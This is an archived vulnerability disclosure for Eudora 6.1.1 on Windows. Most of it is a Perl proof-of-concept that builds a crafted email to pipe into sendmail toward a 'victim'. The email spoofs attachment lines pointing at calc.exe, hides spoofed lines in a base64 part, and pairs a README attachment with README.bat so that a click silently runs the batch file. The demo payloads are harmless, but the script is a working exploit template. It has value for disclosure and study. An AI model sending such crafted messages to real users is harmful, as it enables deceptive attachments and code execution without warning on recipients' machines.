Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows Net Apps :: hack1193.htm

Eudora 6.1.1 attachment spoof, LaunchProtect



Eudora 6.1.1 attachment spoof, LaunchProtect

Eudora 6.1.1 for Windows was released recently. Some buffer oveflow
(exploitable to execute any code) issues seem to be solved, but serious
problems remain. (I do not know if Eudora for Macs is affected.)

Though known for years, the spoofing of attachments is still not fixed.
The problem with LaunchProtect (the X - X.exe dichotomy issue) is not
fixed either (rather it seems un-fixed).

Please see
  http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx 
for more details and history.

Harmless demo below.

Cheers,

Paul Szabo - psz@maths.usyd.edu.au  http://www.maths.usyd.edu.au:8000/u/psz/ 
School of Mathematics and Statistics  University of Sydney   2006  Australia


#!/usr/bin/perl --

use MIME::Base64;

print "From: me\n";
print "To: you\n";
print "Subject: Eudora 6.1.1 on Windows spoof, LaunchProtect\n";
print "MIME-Version: 1.0\n";
print "Content-Type: multipart/mixed; boundary=\"zzz\"\n";
print "X-Use: Pipe the output of this script into:  sendmail -i victim\n\n";
print "This is a multi-part message in MIME format.\n";
print "--zzz\n";
print "Content-Type: text/plain\n";
print "Content-Transfer-Encoding: 7bit\n";
print "\n";

print "With spoofed attachments, we could 'steal' files if the message
was forwarded (not replied to).\n";

#print "
#(Within plain-text email (or plain-text, inline MIME parts) embedded
#CR=x0d characters used to get converted internally into a NUL=x00 and
#ignored, so we could spoof \"attachment converted\" lines.
#At version 6.1.1, embedded CR seem to get converted into NL=x0a.)\n";

print "\nThe  constructs (x-html, x-rich or x-flowed)
allow spoofing attachments easily.
The following work fine (but put up warnings):\n";
print "Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\n";
print "Attachment Converted: c:\\winnt\\system32\\calc.exe\n";
print "Attachment Converted: file.exe\n";
print "These have broken icons, but execute without warning:\n";
print "Attachment Converted: \"c:\\winnt\\system32\\calc\"\n";
print "Attachment Converted: c:\\winnt\\system32\\calc\n";
print "Attachment Converted: file\n";

print "\n
With HTML inclusions we can do
file.exe
(get warning)

and plain file (no warning) references.
(Or can do href=\"http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudor axx\">http and javascript references; the latter
seems to run with IE, regardless of default browser settings.).
\n"; print "\n\n Can also do RTF inclusions. Can that be abused? \n\n"; print "\n--zzz\n"; print "Content-Type: text/plain; name=\"b64.txt\"\n"; print "Content-Transfer-Encoding: base64\n"; print "Content-Disposition: inline; filename=\"b64.txt\"\n"; print "\n"; $z = "Can no longer spoof attachments in quoted-printable parts, but\r still can within base64 encoded (plain-text, inline) MIME parts:\r Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\r Attachment Converted: \"c:\\winnt\\system32\\calc\"\r\n"; print encode_base64($z); print "\n--zzz\n"; print "Content-Type: text/plain\n"; print "Content-Transfer-Encoding: 7bit\n"; print "\n"; $X = 'README'; $Y = "$X.bat"; print "\n\n\nThe X - X.exe dichotomy: send a plain $X attachment:\n"; $z = "rem Funny joke\r\npause\r\n"; print "begin 600 $X\n", pack('u',$z), "`\nend\n"; print "\nand (in another message or after some blurb so is scrolled off in another screenful) also send $Y. Clicking on $X does not get it any more, but gets $Y and runs without any warning:\n"; $z = "rem Big joke\r\nrem Should do something nasty\r\npause\r\n"; print "begin 600 $Y\n", pack('u',$z), "`\nend\n"; #print "\nIf we can guess the full path to the attach directory then can #change the name shown to anything we like, but get broken icon:\n"; #print "Attachment Converted: attach\\README\n"; #print "Attachment Converted: file.txt\n"; #print "\nFunny: I thought that since version 6.0, LaunchProtect handled #the X-X.exe dichotomy (in the attach directory only)...\n"; print "\n"; print "\n--zzz--\n"; print "\n";


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH